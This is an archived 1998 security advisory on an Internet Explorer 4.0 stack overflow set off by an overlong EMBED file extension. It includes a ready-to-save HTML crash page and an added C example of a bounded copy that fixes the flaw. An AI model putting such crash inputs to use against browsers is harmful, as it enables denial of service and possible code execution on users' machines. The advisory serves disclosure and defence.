Another MSIE 4.0 overflow
Description: Standard overflow; this one can almost certainly be exploited by a malicious page to run arbitrary code on a user's system.
Author: Georgi Guninski <guninski@hotmail.com>
Compromise: Run arbitrary code on the machines of Windows users connecting to your web page.
Vulnerable Systems: Windows 95/NT running MSIE 4.0. Perhaps even the Solaris version is vulnerable, though I've never seen anyone run it.
Date: 20 March 1998
Date: Fri, 20 Mar 1998 12:09:46 +0200
From: Georgi Guninski <guninski@hotmail.com>
To: BUGTRAQ@NETSPACE.ORG
Subject: MSIE buffer overrun
Microsoft Internet Explorer 4.0 (don't know about other versions)
can be crashed and eventually made to execute arbitrary code
with a little help from the <EMBED> tag.
The following:
<EMBED SRC=file://C|/A.ABOUT_200_CHARACTERS_HERE___________________>
opens a dialog box and closes IE 4.0.
It seems that the long file extension causes stack overrun.
The stack is smashed - filled with our values; EIP is also ours and CS=SS.
So probably a string could be constructed, executing code at the
client's machine.
Solution: Do not browse hostile pages.
To try this: http://www.geocities.com/ResearchTriangle/1711/msie.html
Georgi Guninski
http://www.geocities.com/ResearchTriangle/1711
-----------------------cut here and save as crashmsie.html---------------------
<HTML>
Trying to crash IE 4.0
<EMBED
SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789>
</HTML>
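The post attributes the crash to the file extension of the EMBED SRC URL being copied into a fixed-size stack buffer without a bound. The following is an added example (not code from the post or from IE) showing the bounded form of that copy: the extension is parsed out of a file:// URL of the shape used above and refused when it does not fit. MAX_EXT, the function names and the constructed URLs are assumptions for the example; the post does not give IE 4.0's real buffer size.

```c
#include <string.h>

/* Largest extension this parser accepts (a constructed limit for the
 * example; the post does not give IE 4.0's real buffer size). */
#define MAX_EXT 16

/* Text after the last '.' of the final path component, or NULL if none. */
static const char *find_extension(const char *url)
{
    const char *slash = strrchr(url, '/');
    const char *name = slash ? slash + 1 : url;
    const char *dot = strrchr(name, '.');
    return (dot && dot[1] != '\0') ? dot + 1 : NULL;
}

/* Copy the extension into a fixed caller buffer with an explicit bound.
 * The bug class in the post is this same copy done unbounded into a fixed
 * stack buffer, so a ~200-character extension runs past the buffer into
 * the saved registers and return address. Here it is refused instead.
 * Returns the extension length, -1 for no extension, -2 for too long. */
int copy_extension(const char *url, char *out, size_t outsz)
{
    const char *ext = find_extension(url);
    if (!ext) return -1;
    size_t len = strlen(ext);
    if (len >= outsz) return -2;     /* leave room for the terminator */
    memcpy(out, ext, len + 1);
    return (int)len;
}

/* Parse one URL into a MAX_EXT-byte stack buffer and report the result. */
int check_url(const char *url)
{
    char ext[MAX_EXT];
    return copy_extension(url, ext, sizeof ext);
}

/* Build a URL in the post's shape, file://C|/A. followed by n digits
 * (constructed input), and run it through check_url(). */
int check_long_extension(size_t n)
{
    char url[512];
    size_t base = strlen("file://C|/A.");
    if (n > sizeof url - base - 1) return -3;
    memcpy(url, "file://C|/A.", base);
    for (size_t i = 0; i < n; i++)
        url[base + i] = (char)('0' + i % 10);
    url[base + n] = '\0';
    return check_url(url);
}
```

check_long_extension(200) reproduces the post's input and returns -2, whereas a normal file://C|/readme.txt returns 3.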
This page is part of Fyodor's exploit world.